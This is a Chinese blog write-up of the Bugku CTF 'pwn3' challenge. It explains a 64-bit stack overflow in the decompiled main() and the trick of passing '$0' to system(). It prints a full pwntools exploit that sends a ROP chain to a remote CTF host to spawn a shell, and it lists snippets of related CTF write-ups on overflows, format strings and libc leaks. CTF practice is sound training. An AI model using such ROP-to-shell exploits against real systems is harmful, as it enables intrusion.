bugku-pwn3

最新推荐文章于 2023-04-01 18:28:56 发布
最新推荐文章于 2023-04-01 18:28:56 发布
阅读量1.7k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39268483/article/details/90766507
本文分析了一个64位程序的栈溢出漏洞,详细解释了如何通过构造特定payload来触发漏洞,实现对system函数的调用,最终获取shell。文中提供了完整的exploit代码,展示了利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

程序是一个保护全关的64位程序,主逻辑如下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-10h]

  memset(&s, 0, 0x10uLL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  puts("Come on,try to pwn me");
  read(0, &s, 0x30uLL);
  puts("So~sad,you are fail");
  return 0LL;
}

程序存在栈溢出漏洞,输入长度为24时出现溢出,输入最大为48。
内部有system函数,但是没有’/bin/sh’
后来看了wp才知道‘$0’亦可以开启shell。
在这里插入图片描述
最后exp如下

from pwn import *
context.log_level='debug'
#io=process('./pwn4')
io=remote('114.116.54.89','10004')
elf=ELF('./pwn4')
io.recv()
sleep(2)
pop_edi_retn=0x4007d3
payload='A'*24+p64(pop_edi_retn)+p64(0x60111f)+p64(elf.symbols['system'])
io.send(payload)
io.recvuntil('fail\n')
sleep(2)
io.interactive()
bugku-pwn-wp
令则
03-27 546
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4540
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
bugku pwn3
doudoudedi
10-11 827
这道题不算太难多次返回main函数就可以了,第一次就leak出canary然后修改最低位就可以返回main函数第二次我们leak出程序的基址再次返回main函数第三次函数我们泄露出libc最后一处返回main函数我们就可以getshell了 exp: from pwn import * from LibcSearcher import * #p=process('./read_note') p=r...
Bugku pwn3
BengDouLove的博客
03-09 437
这道题保护机制全都是开启的 这个程序意思是一开始让你选择一个无关紧要的文件,打开这个文件之后读取文件内容打印,然后就是用户的输入 先输入要输入的内容有多长,之后写入thinking_note,这里thinking_note大小是固定的,所以这里造成栈溢出, 下一步判断是否624个字,也没啥用,好像每次都不对然后进入if,这里又可以读取0x270的内容 这里读入1000 在第一个read的...
[BugkuCTF] PWN3
BurYiA的博客
11-06 869
PWN3 历经千辛万苦终于把这道题拿下了,不容易啊/哭 特此前来记录一下 题目拿到后我们首先checksec一下 保护全开啊有莫有,但是不慌(我承认我看到的时候慌了),继续分析吧 粗略的看一下可以发现有四个输入点(红),并且还有一个返回输入值的输出点(粉) ok,上ida瞅瞅,main函数没啥好说的,我们瞅瞅vul函数 显然我们可以利用那两个read来搞一下事情,他们都是都thinking_not...
bugku pwn libc
09-03
bugku pwn3pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 2245
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2782
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2689
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
bugku pwn1
PRCORANGE的博客
04-13 271
题目: nc 114.67.246.176 10846 nc:全称Netcat,用于连接远程服务器端口。连接后它会返回一个cmdshell用于执行命令(Linux自带该命令)。 在linux中连接服务器,再使用ls查看目录 cat flag
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
pwn4-bugku
weixin_45427676的博客
09-18 778
checksec 首先用checksec命令查看有没有什么保护机制 没有开任何保护机制,用IDA(64位)打开查看main函数。 函数分析 # memset函数 # setvbuf函数 # read函数 经过分析函数可以知道缓冲区中是&s,大小为0x10uLL,read函数是将大小为0x30uLL的数据存放到缓冲区&s中,其大小超过了缓冲区的大小,存在栈溢出。 s大小 ...
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1989
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 4258
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
Bugku pwn4 WP
至臻求学,胸怀云月
02-18 783
下载地址 url checksec [*] '/mnt/hgfs/ubuntu_share/pwn/wiki/pwn4' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x4...
Bugku PWN Easy_int
JEWSWS的博客
04-01 714
【春风不解语,独做狮子吟。】
Bugku pwn4
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-24 347
准备: 可以看到程序没有开任何的保护 运行测试了一下,有一个输入数据的点 IDA 定位到主函数,很明显这里的 s 可以作为溢出的点 浏览了一下找到了system函数,kaix… 找找rop点,查看一下字符串 刚开始也很懵逼,找了一下/bin/bash 没找到,去看了wp,原来这里的$0也是可以利用的,system('/bin/bash')和system('$0')的效果是一样的。 这样我们就可以借用'$0'来溢出拿到shell OK现在我们有...
Bugku pwn5
BengDouLove的博客
02-28 637
我怀着沉重的心情写这个blog,在我做出这道题之前费劲了千辛万苦,花了三天时间,思考加发呆加询问… 菜就不用说了。 好好记录一下吧。 代码中存在格式化字符串漏洞,具体运行起来是这样 这是第一个坑,%x与%p是有区别的,x输出四个字节,p输出八个字节,这是64位的程序,所以地址应该大于四个字节了。 之前一直用的%x最后泄露出来的地址不对,也很难发现。 (菜+1) 为什么是%11$p呢,这要从pri...
level4-DynELF之write函数泄露libc
playmaker的博客
05-02 3075
当题目不提供libc时,可以通过DynELF泄露system的地址 例题level4(32位) 题目逻辑很简单就是通过read函数输入write函数进行输出 read长度限制为0x100,然而需要栈溢出只需要0x8c 查一下保护 题目就很简单了,直接进行DynELF获取system地址,使用read函数在BSS段输入"/bin/sh\x00" from pwn import * p=remote...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值